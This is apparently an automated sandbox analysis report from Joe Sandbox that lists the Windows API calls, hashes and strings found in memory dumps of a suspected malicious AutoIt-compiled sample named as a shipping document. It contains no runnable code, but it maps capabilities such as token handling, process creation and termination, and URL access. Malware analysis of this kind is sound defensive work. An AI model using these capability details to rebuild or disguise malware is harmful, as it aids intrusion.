                                                                                                                                • Part of subcall function 00A083D1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A0841E
                                                                                                                              • GetLengthSid.ADVAPI32(?,00000000,00A08757), ref: 00A08B8C
                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A08B98
                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00A08B9F
                                                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00A08BB8
                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00A08757), ref: 00A08BCC
                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A08BD3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3008561057-0
                                                                                                                              • Opcode ID: 3df4059775847029cdd55757baf7784e8aeb0b3d69aa08658b8570e05bd7463a
                                                                                                                              • Instruction ID: 09186612ece2001dc7149a20f19640332d96ea7b13f00eadcb514e3a38fd6246
                                                                                                                              • Opcode Fuzzy Hash: 3df4059775847029cdd55757baf7784e8aeb0b3d69aa08658b8570e05bd7463a
                                                                                                                              • Instruction Fuzzy Hash: 9811B1B1910208FFDB14DFA4EC09FAE7BA8EB46315F104128F88597190DB399905DB64
                                                                                                                              APIs
                                                                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A0890A
                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00A08911
                                                                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A08920
                                                                                                                              • CloseHandle.KERNEL32(00000004), ref: 00A0892B
                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A0895A
                                                                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00A0896E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1413079979-0
                                                                                                                              • Opcode ID: 580b3239f48db08bb8bb48ddf02cd8ea4fb73e494a3448c0456e98003e5acc92
                                                                                                                              • Instruction ID: 21007465aab1bb07331c83b94aee329e84be8aa916f8eebb8568beefd6cc39cf
                                                                                                                              • Opcode Fuzzy Hash: 580b3239f48db08bb8bb48ddf02cd8ea4fb73e494a3448c0456e98003e5acc92
                                                                                                                              • Instruction Fuzzy Hash: 92115C7250020DEFDF01CFE8ED49BEA7BA9EF09348F044065FE44A21A0C7758D659B65
                                                                                                                              APIs
                                                                                                                              • GetDC.USER32(00000000), ref: 00A0BA77
                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058,?,?,80004003), ref: 00A0BA88
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A,?,?,80004003), ref: 00A0BA8F
                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00A0BA97
                                                                                                                              • MulDiv.KERNEL32 ref: 00A0BAAE
                                                                                                                              • MulDiv.KERNEL32 ref: 00A0BAC0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsDevice$Release
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1035833867-0
                                                                                                                              • Opcode ID: ea0bbbd16cc78bd7f2c52fb5a07ec3c268beef131ba070105291f532c8e20352
                                                                                                                              • Instruction ID: 85908c6b28809af0c14d58672b87e661fd488546cbe0a44781cb4cddd60bd5eb
                                                                                                                              • Opcode Fuzzy Hash: ea0bbbd16cc78bd7f2c52fb5a07ec3c268beef131ba070105291f532c8e20352
                                                                                                                              • Instruction Fuzzy Hash: 38014475E40318BFEB109BE5AD45E5EBFB8EB48751F004065FA04A7291D7719D11CFA0
                                                                                                                              APIs
                                                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 009D0313
                                                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 009D031B
                                                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009D0326
                                                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009D0331
                                                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 009D0339
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009D0341
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Virtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4278518827-0
                                                                                                                              • Opcode ID: b5a5ea193111bb3d0c7e5a23f59a01d34eca6cf52d4aca11ef5eba43cda1d45f
                                                                                                                              • Instruction ID: 6298244fd5d6ef341cce70152948bf81ba64050235b13444a0b0aae8a9485a3c
                                                                                                                              • Opcode Fuzzy Hash: b5a5ea193111bb3d0c7e5a23f59a01d34eca6cf52d4aca11ef5eba43cda1d45f
                                                                                                                              • Instruction Fuzzy Hash: FD0148B09017597DE3008F5A8C85A52FEA8FF19354F00411BA15847941C7B5A864CBE5
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32 ref: 00A154A0
                                                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A154B6
                                                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00A154C5
                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A154D4
                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A154DE
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A154E5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 839392675-0
                                                                                                                              • Opcode ID: bbcea998e3f9347a8aa7a24716b0b9cc924b168052b4c70fd59d64bbc1cbdb4a
                                                                                                                              • Instruction ID: ce3faa5a1dc33d5b4803dc02f300419d471caea8739031261eca01ee338f71be
                                                                                                                              • Opcode Fuzzy Hash: bbcea998e3f9347a8aa7a24716b0b9cc924b168052b4c70fd59d64bbc1cbdb4a
                                                                                                                              • Instruction Fuzzy Hash: BCF03631951558BFD7219BE2DC0EEEF7B7CEFC6B11F000169FA05D1060D7A51A4286B5
                                                                                                                              APIs
                                                                                                                              • InterlockedExchange.KERNEL32(?,?,?,?,?,009F6096,?,?,?,?,009C1044,?,?), ref: 00A172EC
                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,009C1044,?,?), ref: 00A172FD
                                                                                                                              • TerminateThread.KERNEL32(00000000,000001F6,?,009C1044,?,?), ref: 00A1730A
                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,009C1044,?,?), ref: 00A17317
                                                                                                                                • Part of subcall function 00A16CDE: CloseHandle.KERNEL32(00000000), ref: 00A16CE8
                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6,?,009C1044,?,?), ref: 00A1732A
                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,009C1044,?,?), ref: 00A17331
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3495660284-0
                                                                                                                              • Opcode ID: 6ca0d5eb539b68e18392b25aaa50c320e22888b7f407a00b1c1b41b2de695e4a
                                                                                                                              • Instruction ID: f892ca994beba68f7b72f12aafe4137eade04e3aea3f69013da1aa2e6f954583
                                                                                                                              • Opcode Fuzzy Hash: 6ca0d5eb539b68e18392b25aaa50c320e22888b7f407a00b1c1b41b2de695e4a
                                                                                                                              • Instruction Fuzzy Hash: 64F05E76950612EFE7525BE4EE8CDDB773AEF49302B001531FA02950A1CBB55856CBA0
                                                                                                                              APIs
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A08C5F
                                                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00A08C6B
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00A08C74
                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00A08C7C
                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00A08C85
                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A08C8C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 146765662-0
                                                                                                                              • Opcode ID: 3ded19d24a8f76d4065de216d94993a7714cc266a3ac60305332168b95e6afa4
                                                                                                                              • Instruction ID: f7acd8a275b90c7c51c59e2f446261157dff0f8c5e2307aae9e6bb45ac51ad3e
                                                                                                                              • Opcode Fuzzy Hash: 3ded19d24a8f76d4065de216d94993a7714cc266a3ac60305332168b95e6afa4
                                                                                                                              • Instruction Fuzzy Hash: 01E0C236414001FFDA019FE2EC0CD0ABB69FB89322B108230F32985070CB329426DB50
                                                                                                                              APIs
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00A28728
                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 00A28837
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00A289AF
                                                                                                                                • Part of subcall function 00A1760B: VariantInit.OLEAUT32(00000000), ref: 00A1764B
                                                                                                                                • Part of subcall function 00A1760B: VariantCopy.OLEAUT32(00000000,?), ref: 00A17654
                                                                                                                                • Part of subcall function 00A1760B: VariantClear.OLEAUT32(00000000), ref: 00A17660
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                              • API String ID: 4237274167-1221869570
                                                                                                                              • Opcode ID: 02b4c4f473a46a0560ea6f19f00d5650a09078e8c45fb7cd55003e9215d3a43d
                                                                                                                              • Instruction ID: 849bc1e30bb4daf5685453fc61932efbb8dc8d8f5e723da09bf59daf63b6b2b5
                                                                                                                              • Opcode Fuzzy Hash: 02b4c4f473a46a0560ea6f19f00d5650a09078e8c45fb7cd55003e9215d3a43d
                                                                                                                              • Instruction Fuzzy Hash: B4919D756083019FC700EF28D584A6ABBF4EFC9354F14896EF89A8B361DB31E945CB52
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009CFE06: _wcscpy.LIBCMT ref: 009CFE29
                                                                                                                              • _memset.LIBCMT ref: 00A12E7F
                                                                                                                              • GetMenuItemInfoW.USER32 ref: 00A12EAE
                                                                                                                              • SetMenuItemInfoW.USER32 ref: 00A12F61
                                                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A12F8F
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 4152858687-4108050209
                                                                                                                              • Opcode ID: 62f6392dbcc38bd9e91cfe0d8e84f941a45ec6ce735050b6467a088dcf12cb7e
                                                                                                                              • Instruction ID: eb290be23ea51cb3eed61569fc7ac87adb99544f6e9c7c65ad63faddc95c7567
                                                                                                                              • Opcode Fuzzy Hash: 62f6392dbcc38bd9e91cfe0d8e84f941a45ec6ce735050b6467a088dcf12cb7e
                                                                                                                              • Instruction Fuzzy Hash: 3551A0315083019FD7259F68D845BABBBF8AB85360F144A2EF895D32D0DB60CDB68792
                                                                                                                              APIs
                                                                                                                              • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 00A0D8E3
                                                                                                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00A0D919
                                                                                                                              • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 00A0D92A
                                                                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00A0D9AC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                              • String ID: DllGetClassObject
                                                                                                                              • API String ID: 753597075-1075368562
                                                                                                                              • Opcode ID: 9b0819cb1181c0ad9bf60ce04ea965a3aab2b86c06a052ca870d552a03b1bf0d
                                                                                                                              • Instruction ID: a219936e1dce87d4b76151bb21db04558ff9cbf53ced476127bc230a3b4ca973
                                                                                                                              • Opcode Fuzzy Hash: 9b0819cb1181c0ad9bf60ce04ea965a3aab2b86c06a052ca870d552a03b1bf0d
                                                                                                                              • Instruction Fuzzy Hash: D041CF72600208EFDB04CF94E9C4A9ABBB9EF85354B1185A9FD05DF285D7B0DD40CBA0
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Delete$InfoItem_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 1173514356-4108050209
                                                                                                                              • Opcode ID: 6d3dec1dc3b758d8ac47fd17b9a8f83266b28719db3ed76051ca75ab0c609e51
                                                                                                                              • Instruction ID: 396d117e4c4c67f88bf210d6705d465911ab02fd9d3656ec4a4f020173428af7
                                                                                                                              • Opcode Fuzzy Hash: 6d3dec1dc3b758d8ac47fd17b9a8f83266b28719db3ed76051ca75ab0c609e51
                                                                                                                              • Instruction Fuzzy Hash: C141CF3020C3029FD720DF24D885BAABBE9EF84320F14462DF966972E1D770E954CB62
                                                                                                                              APIs
                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 00A2D8D9
                                                                                                                                • Part of subcall function 009B79AB: _memmove.LIBCMT ref: 009B79F9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharLower_memmove
                                                                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                                                                              • API String ID: 3425801089-567219261
                                                                                                                              • Opcode ID: 180ad72bf3fecd8684180dc257cd8e2acfef78ff81d8c0d7469b3f3bf9ed0023
                                                                                                                              • Instruction ID: 3a9d571f9993d037a19eb1af6c85bc10461683abbfb513176f92f2c25065af0b
                                                                                                                              • Opcode Fuzzy Hash: 180ad72bf3fecd8684180dc257cd8e2acfef78ff81d8c0d7469b3f3bf9ed0023
                                                                                                                              • Instruction Fuzzy Hash: 1231B670514615AFCF10EF58D990AEEB3B4FF95320B10862AF8A5A77D2CB31A945CB80
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 009B7F41: _memmove.LIBCMT ref: 009B7F82
                                                                                                                                • Part of subcall function 00A0AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 00A0AEC7
                                                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00A091D6
                                                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00A091E9
                                                                                                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00A09219
                                                                                                                                • Part of subcall function 009B7D2C: _memmove.LIBCMT ref: 009B7D66
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$_memmove$ClassName
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 365058703-1403004172
                                                                                                                              • Opcode ID: 3135488a70d46f9af352f748a0b72855f214f61c219955668b0e3b475583c1b8
                                                                                                                              • Instruction ID: 4deb976203dd7a168326792f55ddb9654ca1100f7843b91755cd32b11d5a536a
                                                                                                                              • Opcode Fuzzy Hash: 3135488a70d46f9af352f748a0b72855f214f61c219955668b0e3b475583c1b8
                                                                                                                              • Instruction Fuzzy Hash: 18212771A001087FDB14ABB4EC86EFFB779DF89360F104629F825A72E1DB391D0A9610
                                                                                                                              APIs
                                                                                                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 009ED51C
                                                                                                                                • Part of subcall function 009B7D2C: _memmove.LIBCMT ref: 009B7D66
                                                                                                                              • _memset.LIBCMT ref: 009B418D
                                                                                                                              • _wcscpy.LIBCMT ref: 009B41E1
                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009B41F1
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.348332982.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.348329030.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A3F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348348252.0000000000A64000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348358896.0000000000A6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.348363348.0000000000A77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOC_20241107.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                              • String ID: Line:
                                                                                                                              • API String ID: 3942752672-1585850449
                                                                                                                              • Opcode ID: 0f471d6dcf7855dfeba75ba0ae04d5a213f8e6de6f2c6fcb8c0f87bfe93acb76
                                                                                                                              • Instruction ID: dcc0459e593a6f0d6317f3198c6f845e821c3fc58e42ec64f733c9df3eb58450
                                                                                                                              • Opcode Fuzzy Hash: 0f471d6dcf7855dfeba75ba0ae04d5a213f8e6de6f2c6fcb8c0f87bfe93acb76
                                                                                                                              • Instruction Fuzzy Hash: C631D97180C3046ED321EBA4DD45BDB77ECAF94320F108A1EF19952192DF709649CBD2
                                                                                                                              APIs
                                                                                                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A21962
